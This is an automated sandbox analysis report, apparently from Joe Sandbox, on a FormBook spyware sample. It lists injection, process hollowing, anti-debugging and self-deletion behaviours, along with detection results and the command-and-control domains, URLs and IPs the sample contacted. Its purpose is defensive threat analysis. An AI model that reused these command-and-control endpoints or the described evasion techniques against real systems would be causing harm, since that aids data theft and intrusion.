Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.248.216.40 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.254.221.72 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.dottproject.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80	Jump to behavior

Contains functionality to prevent local Windows debugging

Show sources

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 1_2_6FC61000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,

1_2_6FC61000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Section loaded: unknown target: C:\Users\user\Desktop\eQLPRPErea.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: EA0000

Jump to behavior

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Process created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\eQLPRPErea.exe'			Jump to behavior

Source: explorer.exe, 00000005.00000002.954492483.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.702734377.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000002.964268158.0000000005E50000.00000004.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.702734377.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.702734377.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.955795157.0000000005680000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.715995251.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection612	Virtualization/Sandbox Evasion3	OS Credential Dumping	Security Software Discovery141	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection612	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing11	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
eQLPRPErea.exe	29%	Virustotal		Browse
eQLPRPErea.exe	31%	ReversingLabs	Win32.Spyware.Noon

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.eQLPRPErea.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.2.wlanext.exe.8bf110.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.eQLPRPErea.exe.1eb20000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.1.eQLPRPErea.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.2.wlanext.exe.3597960.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.eQLPRPErea.exe.6fc60000.6.unpack	100%	Avira	HEUR/AGEN.1131513	Download File

Domains

Source	Detection	Scanner	Link
www.bedpee.com	1%	Virustotal	Browse
www.420vaca.com	0%	Virustotal	Browse
playfulpainters.com	5%	Virustotal	Browse
www.qcmax.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
www.stone-master.info/aqu2/	0%	Avira URL Cloud	safe
http://www.qcmax.com/aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.heliumhubs.com/aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.autobrehna.com/aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p	100%	Avira URL Cloud	malware
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4	0%	Avira URL Cloud	safe
http://www.420vaca.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4	100%	Avira URL Cloud	malware
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.playfulpainters.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH	100%	Avira URL Cloud	malware
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.pmrack.com/aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p	100%	Avira URL Cloud	malware
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.appgusher.com/aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p	100%	Avira URL Cloud	malware
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.bedpee.com/aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p	100%	Avira URL Cloud	malware
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.thesixteenthround.net/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.bedpee.com	13.248.216.40	true	true	1%, Virustotal, Browse	unknown
parking.namesilo.com	64.32.22.102	true	false		high
www.420vaca.com	64.190.62.111	true	true	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	198.54.117.215	true	false		high
playfulpainters.com	34.102.136.180	true	false	5%, Virustotal, Browse	unknown
www.qcmax.com	104.128.125.95	true	true	0%, Virustotal, Browse	unknown
www.appgusher.com	156.254.221.72	true	true		unknown
www.autobrehna.com	62.116.130.8	true	true		unknown
td-balancer-dc11-60-177.wixdns.net	185.230.60.177	true	true		unknown
heliumhubs.com	34.102.136.180	true	false		unknown
pmrack.com	135.181.58.27	true	true		unknown
biehnrecords.com	184.168.131.241	true	true		unknown
www.dottproject.com	91.195.240.94	true	true		unknown
www.biehnrecords.com	unknown	unknown	true		unknown
www.pmrack.com	unknown	unknown	true		unknown
www.heliumhubs.com	unknown	unknown	true		unknown
www.shujahumayun.com	unknown	unknown	true		unknown
www.stone-master.info	unknown	unknown	true		unknown
www.thesixteenthround.net	unknown	unknown	true		unknown
www.nagoyadoori.xyz	unknown	unknown	true		unknown
www.playfulpainters.com	unknown	unknown	true		unknown
www.serversexposed.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.stone-master.info/aqu2/	true	Avira URL Cloud: safe	low
http://www.qcmax.com/aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p	true	Avira URL Cloud: safe	unknown
http://www.heliumhubs.com/aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p	false	Avira URL Cloud: safe	unknown
http://www.autobrehna.com/aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p	true	Avira URL Cloud: malware	unknown
http://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4	true	Avira URL Cloud: safe	unknown
http://www.420vaca.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4	true	Avira URL Cloud: malware	unknown
http://www.playfulpainters.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH	false	Avira URL Cloud: malware	unknown
http://www.pmrack.com/aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p	true	Avira URL Cloud: malware	unknown
http://www.appgusher.com/aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p	true	Avira URL Cloud: malware	unknown
http://www.bedpee.com/aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p	true	Avira URL Cloud: malware	unknown
http://www.thesixteenthround.net/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://produkte.web.de/homepage-und-mail/homepage-parken/	wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 00000005.00000002.955671038.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browsehappy.com/	wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.dottproject.com	Germany	47846	SEDO-ASDE	true
135.181.58.27	pmrack.com	Germany	24940	HETZNER-ASDE	true
64.32.22.102	parking.namesilo.com	United States	46844	ST-BGPUS	false
184.168.131.241	biehnrecords.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
62.116.130.8	www.autobrehna.com	Germany	15456	INTERNETX-ASDE	true
104.128.125.95	www.qcmax.com	United States	26658	HENGTONG-IDC-LLCUS	true
185.230.60.177	td-balancer-dc11-60-177.wixdns.net	Israel	58182	WIX_COMIL	true
34.102.136.180	playfulpainters.com	United States	15169	GOOGLEUS	false
13.248.216.40	www.bedpee.com	United States	16509	AMAZON-02US	true
64.190.62.111	www.420vaca.com	United States	11696	NBS11696US	true
156.254.221.72	www.appgusher.com	Seychelles	136800	XIAOZHIYUN1-AS-APICIDCNETWORKUS	true
198.54.117.215	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383832
Start date:	08.04.2021
Start time:	10:46:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	eQLPRPErea.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/3@15/12
EGA Information:	Failed
HDC Information:	Successful, ratio: 24.2% (good quality ratio 21.9%) Quality average: 73.7% Quality standard deviation: 31.6%
HCA Information:	Successful, ratio: 92% Number of executed functions: 88 Number of non-executed functions: 66
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 40.88.32.150, 23.54.113.53, 52.147.198.201, 104.43.193.48, 20.82.210.154, 23.10.249.26, 23.10.249.43, 104.43.139.144, 20.50.102.62, 52.155.217.156, 20.54.26.129, 168.61.161.212, 52.255.188.83, 13.88.21.125 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
91.195.240.94	zIZsNOecPuLdGCf.exe	Get hash	malicious	Browse	www.healthcosts.care/bgxa/?CRi=kimwlxIHd7tYTuUrLPZsG/65szqB/37B9DF0+7obNGHtG/Ce06RErlKYXOZnRp/3E3Z+&QZ3=ehux_83hOxJTVf
	RMwfvA9kZy.exe	Get hash	malicious	Browse	www.blackmantech.fitness/nnmd/?c2Mh-=lO2MoVQT6pNajXZSE73xMyvXdf5GkN1z0aSPUdRzjxlIRnebkzk7wQJ6JLpBUhzg/rZW&tVm4=J690I
	h8lD4SWL35.exe	Get hash	malicious	Browse	www.explorerthecity.com/nsag/?AjU=nMtIT7UxRyIEAOlaE53kf7KTbdq7isGDN9MTWD/XqSMrXNBDZVXP4jiLBKn/cvoinmSm&njndiL=9rtTFPBhfVt4
	triage_dropped_file.exe	Get hash	malicious	Browse	www.flatfootedhatting.com/mdi/?2dz=o8eDa&-Z5hP4=DioI88TeqQWmfiiOmWmcuaLincjPCeFxAm3Mf4GBdL3hzcnSr+FxxIMhUvAG057P6VV0
	OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exe	Get hash	malicious	Browse	www.jonluxe.com/smzu/?sXUlfNy=4jmgUyxqrzKB9R6KY/Kw9NkpGfAQarlAiZC+A6ZDIzrul26D+9SSDQPuld862RkvQb+o&D8cH=9r8tQzN8o24l6vY
	32ciKQsy2X.exe	Get hash	malicious	Browse	www.cyprusdivingcenters.com/4qdc/?AR-XJ2=GWRfbaKz01PX5Z24EW6v97NylbcBSP0I/uKVXfrPyRhssTOBPKVVwg/7wG9CsgnNb2uF&et-=XPJxZ2SpixNTl6pp
